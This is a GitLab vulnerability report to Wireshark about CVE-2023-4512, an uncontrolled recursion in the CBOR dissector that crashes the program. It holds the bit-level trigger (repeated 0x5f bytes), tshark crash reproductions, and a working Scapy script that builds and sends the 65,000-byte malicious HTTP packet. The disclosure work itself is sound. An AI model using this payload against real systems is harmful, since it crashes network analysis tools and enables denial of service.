CVE-2023-4512: CBOR dissector Uncontrolled Recursion leading to Stack-Overflow | DoS (#19144) · Issues · Wireshark Foundation / Wireshark · GitLab

Summary

An Uncontrolled Recursion (CWE-674) in the CBOR dissector has been found by Simone Di Maria in Wireshark 4.0.6. The vulnerability occurs in dissect_cbor_byte_string() and dissect_cbor_byte_string() functions in the epan/dissectors/packet-cbor.c file which lacks of recursion limit, causing a Stack-Overflow; resulting in a Denial of Service via packet injection or crafted capture file.

Technical details

The vulnerability occurs when encountering a CBOR (Concise Binary Object Representation) byte string element of indefinite length during the parsing process (packet-cbor.c:336). Upon reaching this element, the code enters a while loop that checks the value of eof_type retrieved at the second byte of the CBOR object (offset+1).
If eof_type == 0xff the loop terminate; if (eof_type & 0xe0) >> 5 not equals to CBOR_TYPE_BYTE_STRING (2), returns an error.
If eof_type bypasses these checks, the function recalls itself recursively (packet-cbor.c:390).

Since type_minor is set with eof_type & 0x1f when recalling, if eof_type & 0x1f bypasses the checks and eof_type & 0x1f == 0x1f the execution flow falls back again in the while loop.
An eof_type that accomplishes that is 0x5f, which its binary representation is 01011111. Visualizing the bits as that:

11100000  # \xe0
01011111  # \x5f
00011111  # \x1f

It’s easy to see why that happens:

• 0x5f & 0xe0 gives 01000000
• right-shifting 5 gives 00000010 which is 2 (CBOR_TYPE_BYTE_STRING).
• Then, 0x5f & 0x1f gives 00011111, which is, again, 0x1f.

As a result, if the HTTP request ends with \x5f * 65000 bytes, it will recurse 65000 times.
This Uncontrolled Recursion loop leads to a Stack Overflow, causing Wireshark to crash. Exploiting this vulnerability may allow an attacker trigger a Denial-of-Service condition.

To address this issue, it is recommended to implement a valid termination condition with reasonable max recursion depth to prevent infinite iteration and subsequent stack overflow.

Steps to reproduce

Open the provided pcap with Wireshark or Tshark: cbor_exploit.pcap.
NOTE: The stack-overflow depends on many factors, including the machine architecture, multi-threading, and amount of available memory. Also, the gui.max_tree_depth option set by user in Preferences->Advanced.
What’s sure is that the exploit will consume lots of resources of target machine if gui.max_tree_depth is set high, otherwise, the program will crash with Unhandled exception.

PoC****High max_tree_depth

└─$ tshark -o 'gui.max_tree_depth:65000' -2 -nVxr cbor_exploit.pcap 
Frame 1: 65152 bytes on wire (521216 bits), 65152 bytes captured (521216 bits)
 [...]
    [HTTP request 1/1]
    File Data: 65000 bytes
Concise Binary Object Representation
    Byte String: (indefinite length)
        010. .... = Major Type: Byte String (2)
        ...1 1111 = Size: Indefinite Length (31)
        Byte String (indefinite length)
            Byte String: (indefinite length)
                010. .... = Major Type: Byte String (2)
                ...1 1111 = Size: Indefinite Length (31)
                Byte String (indefinite length)
                    Byte String: (indefinite length)
                        [...]
zsh: segmentation fault  tshark -o 'gui.max_tree_depth:65000' -2 -nVxr cbor_exploit.pcap

Low max_tree_depth

└─$ tshark -o 'gui.max_tree_depth:3' -2 -nVxr cbor_packets.pcap
 ** (tshark:597282) 19:59:33.781692 [Epan WARNING] -- Dissector bug, protocol Ethernet, in packet 1: Maximum tree depth 3 exceeded for "Destination (resolved)" - "eth.dst_resolved" (proto_tree_add_node:5940) (Maximum depth can be increased in advanced preferences)
Unhandled exception ("Maximum tree depth 3 exceeded for "Dissector bug" - "_ws.malformed.dissector_bug" (proto_tree_add_node:5940) (Maximum depth can be increased in advanced preferences)", group=1, code=6)
zsh: IOT instruction  tshark -o 'gui.max_tree_depth:3' -2 -nVxr cbor_packets.pcap

Crashes also in capture mode

└─$ tshark -i 'lo' -o 'gui.max_tree_depth:3' -nVx                    
Capturing on 'Loopback: lo'
 ** (tshark:598456) 20:01:34.964979 [Main MESSAGE] -- Capture started.
 ** (tshark:598456) 20:01:34.965027 [Main MESSAGE] -- File: "/tmp/wireshark_loWSRD61.pcapng"
Unhandled exception ("Maximum tree depth 3 exceeded for "Interface name" - "frame.interface_name" (proto_tree_add_node:5940) (Maximum depth can be increased in advanced preferences)", group=1, code=6)
zsh: IOT instruction  tshark -i 'lo' -o 'gui.max_tree_depth:3' -nVx

Python script to generate exploit:

from scapy.all import *

MAX_PKT_LEN = 65000
NUM_PACKETS = 1
BASE_SRC_PORT = 10000

payload = b'\x5f' * MAX_PKT_LEN

packets = []
src_port = BASE_SRC_PORT
for _ in range(NUM_PACKETS):
    http_request = (
        "POST / HTTP/1.1\r\n"
        f"Content-Length: {MAX_PKT_LEN}\r\n"
        "Content-Type: application/cbor\r\n"
        "Host: example.com\r\n"
        "User-Agent: scapy\r\n"
        "\r\n"
        f"{payload.decode()}"
    )

    pkt = IP(src="127.0.0.1", dst="127.0.0.1") / TCP(sport=src_port, dport=80, flags="PA") / Raw(load=http_request)

    packets.append(pkt)
    src_port += 1

#wrpcap("cbor_exploit.pcap", packets)
send(packets)

Build information

└─$ tshark -v 
TShark (Wireshark) 4.0.6 (Git v4.0.6 packaged as 4.0.6-1~exp1).

Copyright 1998-2023 Gerald Combs <[email protected]> and contributors.
Licensed under the terms of the GNU General Public License (version 2 or later).
This is free software; see the file named COPYING in the distribution. There is
NO WARRANTY; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) using GCC 12.2.0, with GLib 2.74.6, with PCRE2, with zlib
1.2.13, with libpcap, with POSIX capabilities (Linux), with libnl 3, with Lua
5.2.4, with GnuTLS 3.7.9 and PKCS #11 support, with Gcrypt 1.10.1, with Kerberos
(MIT), with MaxMind, with nghttp2 1.53.0, with brotli, with LZ4, with Zstandard,
with Snappy, with libxml2 2.9.14, with libsmi 0.4.8, with binary plugins.

Running on Linux 5.18.0-kali7-amd64, with 11th Gen Intel(R) Core(TM) i5-1135G7 @
2.40GHz (with SSE4.2), with 15791 MB of physical memory, with GLib 2.74.6, with
PCRE2 10.40 2022-04-14, with zlib 1.2.11, with libpcap 1.10.1 (with TPACKET_V3),
with c-ares 1.18.1, with GnuTLS 3.7.7, with Gcrypt 1.10.1, with nghttp2 1.52.0,
with brotli 1.0.9, with LZ4 1.9.4, with Zstandard 1.5.4, with libsmi 0.4.8, with
LC_TYPE=it_IT.UTF-8, binary plugins supported.

For a more detailed understanding of this vulnerability, I’ve attached the ASAN.txt Output.

I’d also like to request a CVE ID for this vulnerability.
This vulnerability is similar to CVE-2013-3562, CVE-2017-9346, CVE-2017-9766, CVE-2018-9262 and CVE-2021-39929.
Please let me know if you need any additional information or assistance in addressing this vulnerability.

Regards,
Simone